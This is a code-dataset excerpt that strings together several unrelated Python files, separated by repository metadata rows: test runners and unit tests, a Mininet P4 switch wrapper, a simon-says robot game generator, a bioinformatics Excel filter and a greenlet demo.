test_inp = os.path.dirname(os.path.abspath(__file__)) + os.path.sep \
+ rel_path + '.inp'
test_ref = os.path.dirname(os.path.abspath(__file__)) + os.path.sep \
+ rel_path + '.ref'
# Enable race detection and uninitialized memory plugins
os.environ["OCLGRIND_CHECK_API"] = "1"
os.environ["OCLGRIND_DATA_RACES"] = "1"
os.environ["OCLGRIND_UNINITIALIZED"] = "1"
def fail(ret=1):
print('FAILED')
sys.exit(ret)
def run(output_suffix):
# Get filename for test output
if test_file.endswith('.sim'):
test_out = test_dir.split(os.path.sep)[-1] + os.path.sep + \
test_name + output_suffix + '.out'
else:
test_out = test_dir + os.path.sep + \
test_name + output_suffix + '.out'
output_dir = os.path.dirname(test_out)
try:
os.makedirs(output_dir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(output_dir):
pass
else:
raise
out = open(test_out, 'w')
try:
inp = open(test_inp, 'r')
except:
inp = None
# Run test
if test_file.endswith('.sim'):
os.chdir(test_dir)
cmd = [oclgrind_exe]
# Add any additional arguments specified in the test file
first_line = open(test_file).readline()[:-1]
if first_line[:7] == '# ARGS:':
cmd.extend(first_line[8:].split(' '))
cmd.append(test_file)
retval = subprocess.call(cmd, stdout=out, stderr=out, stdin=inp)
os.chdir(current_dir)
else:
retval = subprocess.call([oclgrind_exe,test_full_path],
stdout=out, stderr=out, stdin=inp)
out.close()
if retval != 0:
print('Test returned non-zero value (' + str(retval) + ')')
fail(retval)
# Compare output to reference file (if provided)
if os.path.isfile(test_ref):
# Open output and reference files
out = open(test_out).read().splitlines()
ref = open(test_ref).read().splitlines()
# Check output matches references
oi = 0
for line in ref:
if len(line) == 0:
continue
type = line.split()[0]
text = line[6:]
# Find next non-blank line in output file
while True:
if oi >= len(out):
print('Unexpected end of output when matching ' + line)
fail()
if len(out[oi]):
break
oi += 1
if type == 'ERROR':
# Check first line of error contains reference message
if not text in out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
# Skip remaining lines of error
while oi < len(out) and len(out[oi]):
oi += 1
elif type == 'EXACT':
# Check line of output matches reference exactly
if not text == out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
oi += 1
elif type == 'MATCH':
# Check line of output contains reference text
if not text in out[oi]:
print('Expected ' + line)
print('Found "' + out[oi] + '"')
fail()
oi += 1
else:
print('Invalid match type in reference file')
fail()
# Check there are no more lines in output
while oi < len(out):
if len(out[oi]) > 0:
print('Unexpected output after all matches completed (line %d):' % oi)
print(out[oi])
fail()
oi += 1
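# Illustrative aside (not part of the original runner): judging from the
# matching logic in run(), a hypothetical TEST.ref file holds one directive per
# line, with a five-letter match type followed by a space and the expected text
# starting at the seventh character, e.g.
#   EXACT Using device: Oclgrind Simulator
#   MATCH Invalid read of size
#   ERROR Uninitialized value read
# where ERROR also swallows the remaining lines of that error block.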
print('Running test with optimisations')
run('')
print('PASSED')
print('')
print('Running test without optimisations')
os.environ["OCLGRIND_BUILD_OPTIONS"] = "-cl-opt-disable"
run('_noopt')
print('PASSED')
# Test passed
sys.exit(0)
| 26.898305 | 80 | 0.611216 |
4a1b706b619d8318734189983a7e9c91579c5ce1
| 2,523 |
py
|
Python
|
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
boldigger/first_hit.py
|
lokalmatador123/BOLDigger
|
49888c4e01b32cbdfeff9dcaefe2734933100391
|
[
"MIT"
] | null | null | null |
import openpyxl, datetime
import pandas as pd
import PySimpleGUI as sg
def first_hit(xlsx_path):
## load data into a dataframe
data = pd.read_excel(xlsx_path, header = 0, engine = 'openpyxl')
data = data.rename(columns = {'You searched for': 'ID'})
## open workbook for checking the type and create writer to save data later
wb = openpyxl.load_workbook(xlsx_path)
ws = wb.active
writer = pd.ExcelWriter(xlsx_path, engine = 'openpyxl')
writer.book = wb
## check if coi or its / rbcl
type = 'coi' if ws.cell(row = 1, column = 11).value == 'Process ID' else 'its_rbcl'
## top hit is every 20th hit
if type == 'coi':
data = data.iloc[::20]
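        # Illustrative aside (not in the original file): the BOLD result sheet
        # appears to contain a fixed block of 20 hits per query for COI, so
        # rows 0, 20, 40, ... are the respective top hits and the slice above
        # keeps exactly those rows.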
## there can be any number of hit between 1 and 99, so lookup is more complicated
if type == 'its_rbcl':
        ## must include No Match rows, so we don't lose OTUs
first_hits = [1, 'No Match']
## remove everything that is not a top hit or a NoMatch
        ## remove duplicate No Match rows, then drop rows without an ID
data = data[data['Rank'].isin(first_hits)]
data = data.drop_duplicates()
data = data.dropna(subset=['ID'])
## close and save the writer
data.to_excel(writer, sheet_name = 'First hit', index = False)
wb.save(xlsx_path)
writer.close()
## main function to control GUI and flow
def main(xlsx_path):
## define a layout for the new window
layout = [
[sg.Multiline(size = (50, 10), key = 'out', autoscroll = True)]
]
## run the download loop only once. After that only run event loop
window = sg.Window('Adding top hits', layout)
ran = False
while True:
event, values = window.read(timeout = 100)
if not ran:
window['out'].print('%s: Opening resultfile.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
## run first hit function
window['out'].print('%s: Filtering data.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
first_hit(xlsx_path)
window['out'].print('%s: Saving result to new tab.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
window['out'].print('%s: Done. Close to continue.' % datetime.datetime.now().strftime("%H:%M:%S"))
window.Refresh()
ran = True
if event == None:
break
window.Close()
| 32.766234 | 112 | 0.585811 |
4a1b70c39cb8fb6d879bad8e66cdef2eb21005b6
| 3,458 |
py
|
Python
|
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
tests/torchgan/test_trainer.py
|
shubhsherl/torchgan
|
3dd3757dfed7c1f95aa71a7cd71f199390eb5d6d
|
[
"MIT"
] | null | null | null |
import unittest
import torch
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import torchvision
from torch.optim import Adam
import torch.utils.data as data
import torchvision.datasets as dsets
import torchvision.transforms as transforms
from torchgan.metrics import *
from torchgan import *
from torchgan.models import *
from torchgan.losses import *
from torchgan.trainer import Trainer
def mnist_dataloader():
train_dataset = dsets.MNIST(root='./mnist', train=True,
transform=transforms.Compose([transforms.Pad((2, 2)),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5),
std=(0.5, 0.5, 0.5))]), download=True)
train_loader = data.DataLoader(train_dataset, batch_size=128, shuffle=True)
return train_loader
class TestTrainer(unittest.TestCase):
def test_trainer_dcgan(self):
network_params = {
"generator": {"name": DCGANGenerator, "args": {"out_channels": 1, "step_channels": 4},
"optimizer": {"name": Adam, "args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": DCGANDiscriminator, "args": {"in_channels": 1, "step_channels": 4},
"optimizer": {"name": Adam, "args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
def test_trainer_cgan(self):
network_params = {
"generator": {"name": ConditionalGANGenerator, "args": {"num_classes": 10,
"out_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": ConditionalGANDiscriminator, "args": {"num_classes": 10,
"in_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
def test_trainer_acgan(self):
network_params = {
"generator": {"name": ACGANGenerator, "args": {"num_classes": 10,
"out_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}},
"discriminator": {"name": ACGANDiscriminator, "args": {"num_classes": 10,
"in_channels": 1, "step_channels": 4}, "optimizer": {"name": Adam,
"args": {"lr": 0.0002, "betas": (0.5, 0.999)}}}
}
losses_list = [MinimaxGeneratorLoss(), MinimaxDiscriminatorLoss(),
AuxiliaryClassifierGeneratorLoss(), AuxiliaryClassifierDiscriminatorLoss()]
trainer = Trainer(network_params, losses_list, sample_size=1, epochs=1,
device=torch.device('cpu'))
trainer(mnist_dataloader())
| 51.61194 | 105 | 0.565067 |
4a1b7115e1ef0bfeb3007ec018de8f9ac50a29ee
| 937 |
py
|
Python
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | 2 |
2015-03-08T20:46:05.000Z
|
2020-03-14T12:06:11.000Z
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | 1 |
2015-03-01T00:40:55.000Z
|
2015-03-01T00:40:55.000Z
|
src/properties/get_pc_non_productive.py
|
ngannguyen/aimseqtk
|
1ebaee3b927f7fb128de4a59b759c19fceeefb5b
|
[
"MIT"
] | null | null | null |
import os
import sys
def read_clonesize(file):
s2clones = {}
f = open(file, 'r')
f.readline()
for line in f:
items = line.strip().split('\t')
sample = items[0]
clones = int(float(items[1]))
s2clones[sample] = clones
f.close()
return s2clones
def get_np_pc(p_s2clones, np_s2clones, outfile):
f = open(outfile, 'w')
f.write("#Sample\t%%productive\t%%non_productive\n")
for s, p in p_s2clones.iteritems():
np = 0
if s in np_s2clones:
np = np_s2clones[s]
total = p + np
if total > 0:
f.write("%s\t%f\t%f\n" % (s, 100.0*p/total, 100.0*np/total))
f.close()
def main():
pfile = sys.argv[1]
npfile = sys.argv[2]
outfile = sys.argv[3]
p_s2clones = read_clonesize(pfile)
np_s2clones = read_clonesize(npfile)
get_np_pc(p_s2clones, np_s2clones, outfile)
if __name__ == '__main__':
main()
| 24.025641 | 72 | 0.578442 |
4a1b7237674cf3c389b71652b1ce86b7f3051507
| 5,650 |
py
|
Python
|
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | null | null | null |
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | null | null | null |
athos/p4_mininet.py
|
Belthazaar/athos
|
f8b73666f272f4e2d84be090e6dd6bc2953c1c3e
|
[
"Apache-2.0"
] | 1 |
2021-03-01T01:24:02.000Z
|
2021-03-01T01:24:02.000Z
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Further work: Christoff Visser (christoff@iij.ad.jp)
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info, error, debug
from mininet.moduledeps import pathCheck
from sys import exit
import os
import tempfile
import socket
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print("**********")
print(self.name)
print("default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
))
print("**********")
class P4Switch(Switch):
"""P4 virtual switch"""
device_id = 0
def __init__(self, name, sw_path = None, json_path = None,
thrift_port = None,
pcap_dump = False,
log_console = False,
verbose = False,
device_id = None,
enable_debugger = False,
**kwargs):
Switch.__init__(self, name, **kwargs)
assert(sw_path)
assert(json_path)
# make sure that the provided sw_path is valid
pathCheck(sw_path)
# make sure that the provided JSON file exists
if not os.path.isfile(json_path):
error("Invalid JSON file.\n")
exit(1)
self.sw_path = sw_path
self.json_path = json_path
self.verbose = verbose
logfile = "/tmp/p4s.{}.log".format(self.name)
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
self.enable_debugger = enable_debugger
self.log_console = log_console
if device_id is not None:
self.device_id = device_id
P4Switch.device_id = max(P4Switch.device_id, device_id)
else:
self.device_id = P4Switch.device_id
P4Switch.device_id += 1
self.nanomsg = "ipc:///tmp/bm-{}-log.ipc".format(self.device_id)
@classmethod
def setup(cls):
pass
def check_switch_started(self, pid):
"""While the process is running (pid exists), we check if the Thrift
server has been started. If the Thrift server is ready, we assume that
the switch was started successfully. This is only reliable if the Thrift
server is started at the end of the init process"""
while True:
if not os.path.exists(os.path.join("/proc", str(pid))):
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.5)
result = sock.connect_ex(("localhost", self.thrift_port))
finally:
sock.close()
if result == 0:
return True
def start(self, controllers):
"Start up a new P4 switch"
info("Starting P4 switch {}.\n".format(self.name))
args = [self.sw_path]
for port, intf in self.intfs.items():
if not intf.IP():
args.extend(['-i', str(port) + "@" + intf.name])
if self.pcap_dump:
args.append("--pcap")
# args.append("--useFiles")
if self.thrift_port:
args.extend(['--thrift-port', str(self.thrift_port)])
if self.nanomsg:
args.extend(['--nanolog', self.nanomsg])
args.extend(['--device-id', str(self.device_id)])
P4Switch.device_id += 1
args.append(self.json_path)
if self.enable_debugger:
args.append("--debugger")
if self.log_console:
args.append("--log-console")
logfile = "/tmp/p4s.{}.log".format(self.name)
info(' '.join(args) + "\n")
pid = None
with tempfile.NamedTemporaryFile() as f:
# self.cmd(' '.join(args) + ' > /dev/null 2>&1 &')
self.cmd(' '.join(args) + ' >' + logfile + ' 2>&1 & echo $! >> ' + f.name)
pid = int(f.read())
debug("P4 switch {} PID is {}.\n".format(self.name, pid))
if not self.check_switch_started(pid):
error("P4 switch {} did not start correctly.\n".format(self.name))
exit(1)
info("P4 switch {} has been started.\n".format(self.name))
def stop(self):
"Terminate P4 switch."
self.output.flush()
self.cmd('kill %' + self.sw_path)
self.cmd('wait')
self.deleteIntfs()
def attach(self, intf):
"Connect a data port"
assert(0)
def detach(self, intf):
"Disconnect a data port"
assert(0)
| 35.093168 | 86 | 0.579292 |
4a1b72480f701b03aa9e487d3f899ec04fdb2184
| 4,405 |
py
|
Python
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 10 |
2020-04-03T13:02:52.000Z
|
2021-12-22T23:24:00.000Z
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 76 |
2020-04-04T00:25:29.000Z
|
2022-02-27T09:31:49.000Z
|
flo_core/src/simon_says.py
|
Rehab-Robotics-Lab/LilFloSystem
|
913ee95bd776331139bc741ca65dbc53eaa04c21
|
[
"BSD-4-Clause-UC"
] | 6 |
2020-04-08T01:19:46.000Z
|
2021-07-09T01:57:16.000Z
|
#!/usr/bin/env python
"""A module for generating simon says type games"""
import random
from itertools import chain
# ok to have too many args for a utility func
# pylint: disable=too-many-arguments
def sort_defs(new_def, left, right, process_step, check_side_seq, append_action):
"""Sort the definitions from a new game definition into the correct
arms/sequences with speech
Args:
new_def: the game definition
left: sequences on the left arm (add to this)
right: sequences on the right arm (add to this)
process_step: Function to process the step to get out the targets and speech
check_side_seq: Function to find out which side a sequence of motions operates on
append_action: Add the action to the action bag, handling any specialization for game
"""
for step in new_def.steps:
targets, speech = process_step(step, True)
if step.type == 'pose_right':
right.append({'targets': targets, 'speech': speech})
elif step.type == 'pose_left':
left.append({'targets': targets, 'speech': speech})
elif step.type == 'move':
side = check_side_seq(step.id)
if side == 'right':
right.append({'targets': targets, 'speech': speech})
elif side == 'left':
left.append({'targets': targets, 'speech': speech})
elif side == 'both':
append_action(targets, speech)
else:
raise Exception
else:
raise Exception
def mix_bimanual(left, right, append_action):
"""Mix up actions to make them bimanual
Args:
left: The left arm actions
right: The right arm actions
append_action: function to append actions to the final game sequence
"""
while left and right:
left_act = left.pop()
right_act = right.pop()
if random.getrandbits(1):
speech = left_act['speech'] + ' and ' + right_act['speech']
else:
speech = right_act['speech'] + ' and ' + left_act['speech']
targets = left_act['targets']+right_act['targets']
targets.sort(key=lambda target: target.target_completion_time)
append_action(targets, speech)
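# Illustrative aside (not in the original file), with hypothetical entries:
# given left = [{'speech': 'raise your left arm', 'targets': [lt]}] and
# right = [{'speech': 'raise your right arm', 'targets': [rt]}],
# mix_bimanual() pops one action from each arm, joins the speech in a random
# order ("raise your left arm and raise your right arm" or the reverse),
# merges the targets sorted by target_completion_time, and passes the result
# to append_action.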
def simon_says(new_def, process_step, check_side_seq, neutral):
"""Generate a simon says game
Args:
new_def: The game bucket definition to use
process_step: The function which can be used to process steps into actions
Returns: The action list that defines the game
"""
actions_list = []
actions_list.append(
{'speech': 'in simon says, I will tell you something to do and ' +
'show you how to do it, mirrored. If I say simon says, you ' +
'should do it with me. If I do not say simon says, you should ' +
'not do the action. Watch out, I may try to trick you. ' +
'After every movement return to a ready position'})
actions_bag = []
left = []
right = []
def append_action(targets, speech):
"""Append a new action to the bag of actions, adding a non-simon
says action with 30% frequency
Args:
targets: Target to move arms to
speech: Speech to speak
"""
actions_bag.append(
{'speech': 'simon says '+speech, 'targets': targets})
if random.random() > 0.7: # this is where we add in non-simon says tasks
actions_bag.append(
{'speech': speech, 'targets': targets})
sort_defs(new_def, left, right, process_step,
check_side_seq, append_action)
random.shuffle(left)
random.shuffle(right)
if new_def.bimanual:
mix_bimanual(left, right, append_action)
# If either we didn't run in bimanual mode or if there is just some left over in one arm:
while left:
left_act = left.pop()
append_action(left_act['targets'], left_act['speech'])
while right:
right_act = right.pop()
append_action(right_act['targets'], right_act['speech'])
random.shuffle(actions_bag)
actions_list += actions_bag
actions_list.append(
{'speech': 'that was a lot of fun, thanks for playing with me'})
actions_list = list(chain.from_iterable(
(neutral, at) for at in actions_list))
return actions_list
| 37.330508 | 93 | 0.619296 |
4a1b729e64875f271f2998797c7395196ee2fbbb
| 9,203 |
py
|
Python
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 1 |
2021-12-22T13:11:12.000Z
|
2021-12-22T13:11:12.000Z
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 9 |
2020-10-28T07:07:05.000Z
|
2021-06-28T20:05:37.000Z
|
Vereniging/test_lijstverenigingen.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.test import TestCase
from Competitie.models import DeelCompetitie, LAAG_BK, LAAG_RK, LAAG_REGIO
from Competitie.operations import competities_aanmaken
from Functie.models import maak_functie
from NhbStructuur.models import NhbRayon, NhbRegio, NhbCluster, NhbVereniging
from Sporter.models import Sporter
from TestHelpers.e2ehelpers import E2EHelpers
from TestHelpers import testdata
import datetime
class TestVerenigingenLijst(E2EHelpers, TestCase):
""" unit tests voor de Vereniging applicatie, Lijst Verenigingen """
url_lijst = '/vereniging/accommodaties/lijst/'
testdata = None
@classmethod
def setUpTestData(cls):
cls.testdata = testdata.TestData()
cls.testdata.maak_accounts()
def _prep_beheerder_lid(self, voornaam):
lid_nr = self._next_lid_nr
self._next_lid_nr += 1
lid = Sporter()
lid.lid_nr = lid_nr
lid.geslacht = "M"
lid.voornaam = voornaam
lid.achternaam = "Tester"
lid.email = voornaam.lower() + "@nhb.test"
lid.geboorte_datum = datetime.date(year=1972, month=3, day=4)
lid.sinds_datum = datetime.date(year=2010, month=11, day=12)
lid.bij_vereniging = self._ver
lid.save()
return self.e2e_create_account(lid_nr, lid.email, E2EHelpers.WACHTWOORD, accepteer_vhpg=True)
def setUp(self):
""" eenmalige setup voor alle tests
wordt als eerste aangeroepen
"""
self._next_lid_nr = 100001
self.rayon_2 = NhbRayon.objects.get(rayon_nr=2)
self.regio_101 = NhbRegio.objects.get(regio_nr=101)
# maak een test vereniging
ver = NhbVereniging()
ver.naam = "Grote Club"
ver.ver_nr = "1000"
ver.regio = self.regio_101
# secretaris kan nog niet ingevuld worden
ver.save()
self._ver = ver
self.nhb_ver1 = ver
# maak HWL functie aan voor deze vereniging
self.functie_hwl = maak_functie("HWL Vereniging %s" % ver.ver_nr, "HWL")
self.functie_hwl.nhb_ver = ver
self.functie_hwl.save()
# maak test leden aan die we kunnen koppelen aan beheerders functies
self.account_bko = self._prep_beheerder_lid('BKO')
self.account_rko = self._prep_beheerder_lid('RKO')
self.account_rcl = self._prep_beheerder_lid('RCL')
self.account_hwl = self._prep_beheerder_lid('HWL')
self.account_schutter = self._prep_beheerder_lid('Schutter')
# creëer een competitie met deelcompetities
competities_aanmaken(jaar=2019)
self.functie_bko = DeelCompetitie.objects.filter(laag=LAAG_BK)[0].functie
self.functie_rko = DeelCompetitie.objects.filter(laag=LAAG_RK, nhb_rayon=self.rayon_2)[0].functie
self.functie_rcl = DeelCompetitie.objects.filter(laag=LAAG_REGIO, nhb_regio=self.regio_101)[0].functie
self.functie_bko.accounts.add(self.account_bko)
self.functie_rko.accounts.add(self.account_rko)
self.functie_rcl.accounts.add(self.account_rcl)
self.functie_hwl.accounts.add(self.account_hwl)
# maak nog een test vereniging, zonder HWL functie
ver = NhbVereniging()
ver.naam = "Kleine Club"
ver.ver_nr = "1100"
ver.regio = self.regio_101
# secretaris kan nog niet ingevuld worden
ver.save()
# stop de vereniging in clusters
cluster = NhbCluster.objects.filter(regio=ver.regio, gebruik='18').all()[0]
ver.clusters.add(cluster)
cluster = NhbCluster.objects.filter(regio=ver.regio, gebruik='25').all()[2]
ver.clusters.add(cluster)
self.nhb_ver2 = ver
def test_anon(self):
self.e2e_logout()
with self.assert_max_queries(20):
resp = self.client.get(self.url_lijst)
self.assert403(resp)
self.e2e_assert_other_http_commands_not_supported(self.url_lijst)
def test_it(self):
# landelijke lijst + leden aantal
self.e2e_login_and_pass_otp(self.testdata.account_admin)
self.e2e_wisselnaarrol_it()
self.e2e_check_rol('IT')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_bb(self):
# landelijke lijst met rayon & regio
self.e2e_login_and_pass_otp(self.testdata.account_bb)
self.e2e_wisselnaarrol_bb()
self.e2e_check_rol('BB')
with self.assert_max_queries(8):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_bko(self):
# landelijke lijst met rayon & regio
self.e2e_login_and_pass_otp(self.account_bko)
self.e2e_wissel_naar_functie(self.functie_bko)
self.e2e_check_rol('BKO')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_rko(self):
# rayon lijst met regio kolom (geen rayon kolom)
self.e2e_login_and_pass_otp(self.account_rko)
self.e2e_wissel_naar_functie(self.functie_rko)
self.e2e_check_rol('RKO')
with self.assert_max_queries(7):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_rcl(self):
# regio lijst met hwls (zonder rayon/regio kolommen)
self.e2e_login_and_pass_otp(self.account_rcl)
self.e2e_wissel_naar_functie(self.functie_rcl)
self.e2e_check_rol('RCL')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
self.e2e_assert_other_http_commands_not_supported(self.url_lijst)
def test_rcl_met_clusters(self):
# test de lijst met clusters erin
# log in als RCL
self.e2e_login_and_pass_otp(self.account_rcl)
self.e2e_wissel_naar_functie(self.functie_rcl)
self.e2e_check_rol('RCL')
# verenigingen 1 en 2 horen beide bij regio 101
# stop ze een voor een in een eigen cluster
# maak een cluster aan en stop nhb_ver1 erin
cluster = NhbCluster()
cluster.regio = self.nhb_ver1.regio
cluster.letter = 'Y'
cluster.naam = "Bovenlijns"
cluster.gebruik = '18'
cluster.save()
self.nhb_ver1.cluster = cluster
self.nhb_ver1.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
# stop nhb_ver2 in hetzelfde cluster
self.nhb_ver2.cluster = cluster
self.nhb_ver2.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
# stop nhb_ver2 in een apart cluster
cluster = NhbCluster()
cluster.regio = self.nhb_ver1.regio
cluster.letter = 'Z'
cluster.naam = "Onderlijns"
cluster.gebruik = '18'
cluster.save()
self.nhb_ver2.cluster = cluster
self.nhb_ver2.save()
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
def test_hwl(self):
# de hwl krijgt dezelfde lijst als de rcl
self.e2e_login_and_pass_otp(self.account_hwl)
self.e2e_wissel_naar_functie(self.functie_hwl)
self.e2e_check_rol('HWL')
with self.assert_max_queries(9):
resp = self.client.get(self.url_lijst)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('vereniging/lijst-verenigingen.dtl', 'plein/site_layout.dtl'))
def test_overzicht_anon(self):
with self.assert_max_queries(20):
resp = self.client.get('/bondscompetities/')
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_html_ok(resp)
self.assert_template_used(resp, ('competitie/kies.dtl', 'plein/site_layout.dtl'))
# end of file
| 38.831224 | 110 | 0.664457 |
4a1b73355d2e16f23c98ad5143b50f40b9d2e57e
| 242 |
py
|
Python
|
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | 7 |
2019-01-14T01:11:32.000Z
|
2022-01-17T16:28:56.000Z
|
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | null | null | null |
Chapter01/greenlet_demo.py
|
mtianyan/PythonMicroservicesDevelopment_Code
|
a99c6c18dfb40e790aa4a5e24ff5eba495e64743
|
[
"Apache-2.0"
] | 2 |
2019-01-14T00:51:49.000Z
|
2020-08-13T03:18:27.000Z
|
from greenlet import greenlet
# pip install greenlet
def test1(x, y):
z = gr2.switch(x+y)
print(z)
def test2(u):
print (u)
gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
hello world
42
"""
| 12.736842 | 29 | 0.665289 |
4a1b734895efe1b2bec278b565c214fc0ed38f92
| 12,667 |
py
|
Python
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 19 |
2015-05-01T19:59:03.000Z
|
2021-12-09T08:03:16.000Z
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 1 |
2018-01-03T15:26:49.000Z
|
2018-01-03T15:26:49.000Z
|
desktop/core/ext-py/Twisted/twisted/internet/task.py
|
civascu/hue
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
[
"Apache-2.0"
] | 30 |
2015-03-25T19:40:07.000Z
|
2021-05-28T22:59:26.000Z
|
# -*- test-case-name: twisted.test.test_task -*-
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Scheduling utility methods and classes.
@author: Jp Calderone
"""
__metaclass__ = type
import time
from zope.interface import implements
from twisted.python import reflect
